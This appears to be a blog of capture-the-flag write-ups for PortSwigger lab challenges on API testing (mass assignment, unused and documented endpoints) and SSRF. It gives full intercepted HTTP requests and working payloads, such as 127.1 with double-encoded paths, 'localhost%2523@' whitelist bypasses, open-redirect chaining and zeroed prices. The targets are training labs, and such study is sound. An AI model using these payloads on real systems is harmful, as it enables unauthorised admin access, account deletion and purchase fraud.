API testing: challange 3

Exploiting a mass assignment vulnerability Link: https://portswigger.net/web-security/api-testing/lab-exploiting-mass-assignment-vulnerability To solve the lab, find and exploit a mass assignment vulnerability to buy a Lightweight l33t Leather Jacket. You can log in to your own account using the following credentials: wiener:peter. solution Start the challange by logging using wiener:peter credentials I navigated through the website to find api endpoints After navigation i found it when you add item to cart, go to your cart and click place order This moves you to this API endpoint /api/checkout and this is the request body when the request method is POST { "chosen_products":[ { "product_id":"1", "quantity":1, "item_price":0 } ] } I tried to change the request method to PUT and i found in the response that only GET, POST are the allowed methods When i change the request method to GET i get this response { "chosen_discount":{ "percentage":0 }, "chosen_products":[ { "product_id":"1", "name":"Lightweight \"l33t\" Leather Jacket", "quantity":2, "item_price":133700 } ] } We note that there’s chosen_discount Let’s add it the body of the request and send the post request but after making the chosen_discount = 100 Congratzzzzzzzzzzzzzzzzzz

CTF · 2024-03-05

API testing: challange 2

Finding and exploiting an unused API endpoint Link: https://portswigger.net/web-security/api-testing/lab-exploiting-unused-api-endpoint To solve the lab, exploit a hidden API endpoint to buy a Lightweight l33t Leather Jacket. You can log in to your own account using the following credentials: wiener:peter solution Start the challange by logging using wiener:peter credentials I navigated through the website to find api endpoints After some navigation, I found that when you go to https://0ad4003703ff9a3680c8767500820061.web-security-academy.net/product?productId=1 you will visit the API endpoint /api/products/1/price After some trials i found that when i change the request method the response gives me this Allow: GET, PATCH when i try PATCH request method, i get this in the response {"type":"ClientError","code":400,"error":"Only 'application/json' Content-Type is supported"}’ So let’s add this header Content-Type: application/json and i got internal server error After trials i found that by adding {} in the body of the request i get this message in the response {"type":"ClientError","code":400,"error":"'price' parameter missing in body"} So i added the price parameter in the request body and set it to 0 like this {"price":0} Nice, when i go to my cart i find that the total price = 0 so i can purchase now Congratzzzzzzzzzzzzzz

CTF · 2024-03-05

API testing: challange 1

Exploiting an API endpoint using documentation Link: https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation To solve the lab, find the exposed API documentation and delete carlos. You can log in to your own account using the following credentials: wiener:peter solution Start the challange by logging using wiener:peter credentials I navigated through the website to find api endpoints but i didn’t find I tried to find if there’s an exposed api documentation by visiting the url https://0a3c005a033bf00881c694ba005c0041.web-security-academy.net/api/ I found this page The info we need are here we can delete the user carlos now by visiting https://0a3c005a033bf00881c694ba005c0041.web-security-academy.net/api/user/carlos and making the request DELETE Congratzzzzzzzzzzzz

CTF · 2024-03-05

SSRF: challange 5

SSRF with filter bypass via open redirection Link: https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos. The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly. so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/2 Host: 0aba00cf04fc37d787d2ecab009800c8.web-security-academy.net Cookie: session=Jkj8BtT8GyJXGIIkD92AI4jVwg1i5kVt; session=xePg3AZmakzW3clhYyuezrf201WpqbH6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0aba00cf04fc37d787d2ecab009800c8.web-security-academy.net/product?productId=5 Content-Type: application/x-www-form-urlencoded Content-Length: 65 Origin: https://0aba00cf04fc37d787d2ecab009800c8.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers stockApi=%2Fproduct%2Fstock%2Fcheck%3FproductId%3D5%26storeId%3D1 we see that in the stockAPI parameter, we can’t make the server issue the request directly to a different host. but when we intercept next product request we find that there’s a path parameter so we can make use of it in stockAPI parameter ny making it = /product/nextProduct?path=http://192.168.0.12:8080/admin It redirects us to admin interface, so let’s delete carlos by making stockAPI=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos congratzzzzzzzzzzzz

CTF · 2024-02-09

SSRF: challange 4

SSRF with whitelist-based input filter Link: https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed an anti-SSRF defense you will need to bypass. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly u will get this message Admin interface only available if logged in as an administrator, or if requested from loopback so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/2 Host: 0a0d0067037080968141b6080065004b.web-security-academy.net Cookie: session=h74HgBoArcl80JrdU0IBbH5Edvr3JI69 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0a0d0067037080968141b6080065004b.web-security-academy.net/product?productId=3 Content-Type: application/x-www-form-urlencoded Content-Length: 107 Origin: https://0a0d0067037080968141b6080065004b.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D3%26storeId%3D1 notice that stockApi parameter has a url as a value, so let’s try to change it to http://localhost/admin and the send the request ummmmmmmmmmm it’s blocked and also all the trials like http://127.1 let’s try this http://localhost@stock.weliketoshop.net/ this gives “Internal Server Error” response. after appending # to localhost the url is rejected so let’s try double URL encoding the # to be %2523 then the stockApi parameter became http://localhost%2523@stock.weliketoshop.net/ and the status code of the response became 200 let’s delete carlos using http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos congratzzzzzzzzzzzzzzzzzz

CTF · 2024-02-09

SSRF: challange 3

SSRF with blacklist-based input filter Link: https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed two weak anti-SSRF defenses that you will need to bypass. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly u will get this message Admin interface only available if logged in as an administrator, or if requested from loopback so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/1.1 Host: 0a8800100385496e84c90fc700fa00af.web-security-academy.net Cookie: session=ffMtPXx2g8AmQYwWYmNulgDa0wkhrt4i User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0a8800100385496e84c90fc700fa00af.web-security-academy.net/product?productId=2 Content-Type: application/x-www-form-urlencoded Content-Length: 107 Origin: https://0a8800100385496e84c90fc700fa00af.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D2%26storeId%3D1 notice that stockApi parameter has a url as a value, so let’s try to change it to http://localhost/admin and the send the request ummmmmmmmmmm it’s blocked so let’s try this http://127.1 Nice we got response with status code 200 OK then let’s try http://127.1/admin It’s blocked so there may be restriction on admin let’s do some obsufication like double url encoding of any character like a is example the payload became http://127.1/%25%36%31dmin sent the request Nice we got response with status code 200 OK when we look at the response body we see this <div> <span>wiener - </span> <a href="/admin/delete?username=wiener">Delete</a> </div> <div> <span>carlos - </span> <a href="/admin/delete?username=carlos">Delete</a> </div> and that’s what we exactly need send the previous request again but with stockApi parameter value = http://127.1/%25%36%31dmin/delete?username=carlos Carlos is deleted Congratzzzzzzzzzzzzzzzzzzzzzzzzzzzz

CTF · 2024-02-09

SSRF: challange 2

Basic SSRF against another back-end system Link: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly. so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/1.1 Host: 0aa4001c041a5c3f81caca2000520096.web-security-academy.net Cookie: session=2Gw97cnP5g3C7q7rHceYJzb6gt78siRj User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0aa4001c041a5c3f81caca2000520096.web-security-academy.net/product?productId=1 Content-Type: application/x-www-form-urlencoded Content-Length: 96 Origin: https://0aa4001c041a5c3f81caca2000520096.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close stockApi=http%3A%2F%2F192.168.0.1%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1 notice that stockApi parameter has a url as a value, so let’s try to change it to http://192.168.0.x:8080/admin as said in describtion. we don’t know the value of x so we will send the request to the intruder for brute forcing to be like this POST /product/stock HTTP/1.1 Host: 0aa4001c041a5c3f81caca2000520096.web-security-academy.net Cookie: session=2Gw97cnP5g3C7q7rHceYJzb6gt78siRj User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0aa4001c041a5c3f81caca2000520096.web-security-academy.net/product?productId=1 Content-Type: application/x-www-form-urlencoded Content-Length: 96 Origin: https://0aa4001c041a5c3f81caca2000520096.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close stockApi=http://192.168.0.§x§:8080/admin notice that x is between two of § character, as it’s parameter of the brute force to choose the values of it we will go to payloads tab change payload type to numbers and make it ranges from 0 to 255 with step 1 start the attack and wait until you see a request with status 200 when you find it this means that this is the suitable ip back to the repeater and use it with changing the value of the stockApi to: /admin/delete?username=carlos carlos is deleted congratzzzzzzzzzzzzzzzzzzzzz

CTF · 2024-02-09

SSRF: challange 1

Basic SSRF against the local server Link: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly u will get this message Admin interface only available if logged in as an administrator, or if requested from loopback so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/1.1 Host: 0a81005f047071e181a5de86001a00cb.web-security-academy.net Cookie: session=CMThK0h99viMGTnCHS5TWoh3xgfVOzH5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0a81005f047071e181a5de86001a00cb.web-security-academy.net/product?productId=2 Content-Type: application/x-www-form-urlencoded Content-Length: 107 Origin: https://0a81005f047071e181a5de86001a00cb.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D2%26storeId%3D1 notice that stockApi parameter has a url as a value, so let’s try to change it to http://localhost/admin and the send the request Nice we got response with status code 200 OK when we look at the response body we see this <div> <span>wiener - </span> <a href="/admin/delete?username=wiener">Delete</a> </div> <div> <span>carlos - </span> <a href="/admin/delete?username=carlos">Delete</a> </div> and that’s what we exactly need send the previous request again but with stockApi parameter value = http://localhost/admin/delete?username=carlos Carlos is deleted Congratzzzzzzzzzzzzzzzzzzzzzzzzzzzz

CTF · 2024-02-09

0xk4k45h1

Contact

PortSwigger